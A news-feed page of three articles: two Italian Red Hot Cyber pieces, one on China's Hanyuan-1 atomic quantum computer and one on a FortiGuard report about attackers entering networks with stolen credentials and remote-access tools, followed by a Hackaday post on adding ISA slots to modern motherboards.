Hanyuan-1: il computer quantistico cinese che funziona a temperatura ambiente e sfida gli USA


Il primo computer quantistico atomico cinese ha raggiunto un importante traguardo commerciale, registrando le sue prime vendite a clienti nazionali e internazionali, secondo quanto riportato dai media statali. L’Hubei Daily, quotidiano statale della provincia di Hubei in Cina, ha riportato che la prima unità commerciale Hanyuan-1è stata consegnata a una filiale del fornitore di telecomunicazioni China Mobile, con un ordine anche da parte del Pakistan. Le vendite sono state valutate in oltre 40 milioni di yuan (circa 5 milioni di euro).

Temperatura ambiente e produzione di massa


Il rapporto afferma che l’Hanyuan-1 è una delle poche macchine nel campo emergente del calcolo quantistico atomico ad aver raggiunto la produzione di massa e la spedizione in tutto il mondo. Lo sviluppo della macchina, che può essere utilizzata per eseguire calcoli complessi come la modellazione finanziaria e l’ottimizzazione logistica, è stato guidato dall’Accademia di Scienza e Innovazione Tecnologica delle Misure di Precisione dell’Accademia Cinese delle Scienze, con sede nel centro di Wuhan.

Utilizzando i principi della meccanica quantistica, i computer quantistici possono eseguire calcoli e risolvere problemi complessi molto più velocemente dei computer classici. Questo risultato si ottiene utilizzando i qubit, che possono essere simultaneamente sia 0 che 1 grazie a una proprietà chiamata sovrapposizione. Tuttavia, i ricercatori faticano ancora a eliminare gli errori nei dispositivi che gestiscono milioni di qubit.

Con questa sfida ancora irrisolta, gli sviluppatori hanno adottato un approccio pratico, concentrandosi inizialmente su applicazioni industriali che coinvolgono solo poche decine o poche centinaia di qubit. Queste macchine sono chiamate computer quantistici di scala intermedia (NISQ). L’Hanyuan-1 è una di queste macchine. Secondo i rapporti, il computer quantistico atomico dispone di 100 qubit e raggiunge “standard prestazionali di livello mondiale”.

A differenza di altri computer quantistici che utilizzano ioni, fotoni o “atomi artificiali”, l’Hanyuan-1 utilizza atomi con carica neutra come qubit e li manipola con laser per eseguire calcoli. L’Hanyuan-1 è stato presentato a giugno, segnando il culmine di quasi 20 anni di ricerca e impegno ingegneristico che hanno portato non solo all’indipendenza dei suoi componenti principali, ma anche a diverse scoperte scientifiche.

Focus su applicazioni avanzate reali


Dal 2018, gli Stati Uniti limitano l’accesso della Cina ad alcuni componenti per il calcolo quantistico, come i laser, stimolando i progressi della Cina in questo campo. Il rapporto afferma che il team di Wuhan ha superato diverse sfide per sviluppare un laser che soddisfi requisiti di alta precisione. Di conseguenza, il laser è significativamente più economico e utilizza solo un decimo della potenza dei laser stranieri.

“Questo risultato rompe la dipendenza della Cina dalle catene di approvvigionamento occidentali e stabilisce un vantaggio indipendente nell’hardware per il calcolo quantistico atomico”, si legge nel rapporto. Rispetto ai tradizionali computer quantistici superconduttori, il computer atomico consuma significativamente meno energia, è molto più semplice da manutenere ed è “esponenzialmente” più economico da installare.

Questo perché il sistema non richiede raffreddamento criogenico. L’intero sistema può essere integrato in tre rack standard e funziona in un ambiente di laboratorio standard. Il rapporto afferma che il team si sta preparando a costruire il primo centro cinese di calcolo quantistico atomico in grado di supportare requisiti di calcolo altamente complessi, come l’analisi del rischio finanziario per migliaia di utenti aziendali.

Il documento citava un responsabile di progetto anonimo che affermava: “La concorrenza nel settore si concentra attualmente sulla praticità del sistema e sulle capacità ingegneristiche piuttosto che sul numero di qubit. Il responsabile del progetto ha dichiarato: “Continueremo a migliorare le prestazioni complessive dei computer quantistici atomici, concentrandoci su applicazioni avanzate come la scoperta di farmaci e la progettazione di materiali”.

Dalla dipendenza all’autonomia sul quantum computing


Ha aggiunto: “Il nostro obiettivo è fornire servizi di calcolo atomico scalabili entro il 2027. La commercializzazione dell’Hanyuan-1 dimostra il rapido progresso della Cina nel calcolo quantistico. Nonostante le restrizioni statunitensi sulle esportazioni di tecnologia, la Cina ha raggiunto una svolta grazie al proprio sviluppo tecnologico.

In particolare, il fatto che non richieda raffreddamento criogenico e sia a basso costo lo rende vantaggioso per l’uso commerciale. I computer quantistici superconduttori richiedono temperature estremamente basse, prossime allo zero assoluto, con conseguenti costi operativi significativi. Un esperto di calcolo quantistico ha affermato: “I computer quantistici atomici funzionano a temperatura ambiente e sono facili da manutenere, il che li rende estremamente pratici. Tuttavia, permangono le sfide nell’aumentare il numero di qubit e ridurre i tassi di errore”.

Gli esperti ritengono che la Cina abbia adottato una strategia incentrata sulla praticità del calcolo quantistico. Invece di competere sul numero di qubit, si sta concentrando sullo sviluppo di sistemi con applicazioni pratiche. L’industria prevede che il calcolo quantistico rivoluzionerà diversi campi, tra cui la finanza, lo sviluppo di farmaci, l’ottimizzazione logistica e la crittografia. Tuttavia, si prevede che la commercializzazione richiederà ancora tempo.

Nel contesto dell’intensificarsi della competizione tecnologica tra Stati Uniti e Cina, il calcolo quantistico sta diventando un altro ambito di competizione, dopo l’intelligenza artificiale e i semiconduttori. La commercializzazione dell’Hanyuan-1 da parte della Cina indica che la Cina sta iniziando a ottenere risultati tangibili in questa competizione.

L'articolo Hanyuan-1: il computer quantistico cinese che funziona a temperatura ambiente e sfida gli USA proviene da Red Hot Cyber.


Addio al malware! Nel 2025 i criminal hacker entrano con account legittimi per restare invisibili


Un report di FortiGuard relativo alla prima metà del 2025 mostra che gli aggressori motivati economicamente stanno rinunciando sempre più a exploit e malware sofisticati. Invece di implementare strumenti utilizzano account validi e strumenti di accesso remoto legittimi per penetrare nelle reti aziendali senza essere rilevati.

Questo approccio si è dimostrato non solo più semplice ed economico, ma anche significativamente più efficace: gli attacchi che utilizzano password rubate sfuggono sempre più spesso al rilevamento.

Gli esperti riferiscono che nei primi sei mesi dell’anno hanno indagato su decine di incidenti in diversi settori, dalla produzione alla finanza e alle telecomunicazioni. L’analisi di questi casi ha rivelato uno schema ricorrente: gli aggressori ottengono l’accesso utilizzando credenziali rubate o acquistate , si connettono tramite VPN e quindi si muovono nella rete utilizzando strumenti di amministrazione remota come AnyDesk, Atera, Splashtop e ScreenConnect.
Prevalenza della tecnica di accesso iniziale nel primo semestre 2025 (Fonte Fortinet)
Questa strategia consente loro di mascherare la loro attività come attività di amministratore di sistema ed evitare sospetti. FortiGuard conferma questi risultati nello stesso periodo: le tendenze relative alle perdite di password documentate nei documenti open source corrispondono a quelle identificate durante le indagini interne. In sostanza, gli aggressori non devono “hackerare” i sistemi nel senso tradizionale del termine: accedono semplicemente utilizzando le credenziali di accesso di qualcun altro, spesso ottenute tramite phishing o infostealervenduti su piattaforme clandestine.

In un attacco analizzato, gli aggressori hanno utilizzato credenziali valide per connettersi a una VPN aziendale senza autenticazione a più fattori , quindi hanno estratto le password dell’hypervisor salvate dal browser dell’utente compromesso e hanno crittografato le macchine virtuali. In un altro caso, un operatore ha ottenuto l’accesso tramite un account di amministratore di dominio rubato e ha installato in massa AnyDesk sull’intera rete utilizzando RDP e criteri di gruppo, consentendogli di spostarsi tra i sistemi e di rimanere inosservato per periodi di tempo più lunghi. Ci sono stati anche casi in cui gli aggressori hanno sfruttato una vecchia vulnerabilità in un server esterno, implementato diversi strumenti di gestione remota e creato account di servizio fittizi per spostare e poi rubare documenti di nascosto.

L’analisi ha dimostrato che il furto di password rimane una delle strategie più economiche e accessibili. Il costo dell’accesso dipende direttamente dalle dimensioni e dall’area geografica dell’azienda: per le organizzazioni con oltre un miliardo di dollari di fatturato nei paesi sviluppati, può raggiungere i 20.000 dollari, mentre per le aziende più piccole nelle regioni in via di sviluppo, si aggira sulle centinaia di dollari. Le massicce campagne di infostealing forniscono un flusso costante di dati aggiornati e la bassa barriera all’ingresso rende tali attacchi appetibili anche per gruppi meno addestrati.

Il vantaggio principale di questo schema è la furtività. Il comportamento degli aggressori è indistinguibile da quello dei dipendenti legittimi, soprattutto se si connettono durante il normale orario di lavoro e agli stessi sistemi.

Gli strumenti di sicurezza focalizzati sulla scansione di file dannosi e processi sospetti spesso non sono in grado di rilevare anomalie quando l’attacco si limita all’accesso di routine e alla navigazione in rete. Inoltre, quando si rubano manualmente dati tramite interfacce RDP o funzionalità RMM integrate, è difficile risalire ai file trasferiti, poiché tali azioni non lasciano artefatti di rete evidenti.

Secondo le osservazioni di FortiGuard, gli aggressori coinvolti in tali campagne continuano a utilizzare attivamente Mimikatz e le sue varianti per estrarre le password dalla memoria, e continuano a utilizzare l’exploit Zerologon per l’escalation dei privilegi. A volte, utilizzano anche manualmente utility come GMER, rinominate “strumenti di sistema”, per nascondere la propria presenza.

FortiGuard sottolinea che la protezione da tali minacce richiede un ripensamento degli approcci. Affidarsi esclusivamente ai tradizionali sistemi EDR che analizzano il codice dannoso non garantisce più una sicurezza affidabile. Una strategia basata sugli account e sul comportamento degli utenti sta diventando più efficace.

Le aziende devono creare i propri profili di attività normale e rispondere tempestivamente alle deviazioni, ad esempio accessi da posizioni geografiche insolite, connessioni simultanee a più server o attività al di fuori dell’orario di lavoro.

Si raccomanda particolare attenzione all’autenticazione a più fattori, non solo per il perimetro esterno, ma anche all’interno della rete. Anche se un aggressore ottiene una password, richiedere un’autenticazione aggiuntiva ne rallenterà i progressi e creerà maggiori possibilità di essere individuato. È inoltre importante limitare i privilegi di amministratore, impedire l’uso di account privilegiati tramite VPN e monitorarne gli spostamenti all’interno dell’infrastruttura.

FortiGuard consiglia alle organizzazioni di controllare rigorosamente l’uso di strumenti di amministrazione remota. Se tali programmi non sono necessari per motivi aziendali, è opportuno bloccarli e monitorare eventuali nuove installazioni o connessioni di rete ad essi associate. Inoltre, si consiglia di disabilitare SSH, RDP e WinRM su tutti i sistemi in cui non sono necessari e di configurare avvisi per la riattivazione di questi servizi. Secondo gli analisti, tali misure possono rilevare anche tentativi nascosti di spostamento laterale all’interno della rete.

L'articolo Addio al malware! Nel 2025 i criminal hacker entrano con account legittimi per restare invisibili proviene da Red Hot Cyber.


Adding ISA Ports To Modern Motherboards


Modern motherboards don’t come with ISA slots, and almost everybody is fine with that. If you really want one, though, there are ways to get one. [TheRasteri] explains how in a forum post on the topic.

Believe it or not, some post-2010 PC hardware can still do ISA, it’s just that the slots aren’t broken out or populated on consumer hardware. However, if you know where to look, you can hack in an ISA hookup to get your old hardware going. [TheRasteri] achieves this on motherboards that have the LPC bus accessible, with the use of a custom PCB featuring the Fintek F85226 LPC-to-ISA bridge. This allows installing old ISA cards into a much more modern PC, with [TheRasteri] noting that DMA is fully functional with this setup—important for some applications. Testing thus far has involved a Socket 755 motherboard and a Socket 1155 motherboard, and [TheRasteri] believes this technique could work on newer hardware too as long as legacy BIOS or CSM is available.

It’s edge case stuff, as few of us are trying to run Hercules graphics cards on Windows 11 machines or anything like that. But if you’re a legacy hardware nut, and you want to see what can be done, you might like to check out [TheRasteri’s] work over on Github. Video after the break.

youtube.com/embed/putHMSzu5og?…


hackaday.com/2025/11/03/adding…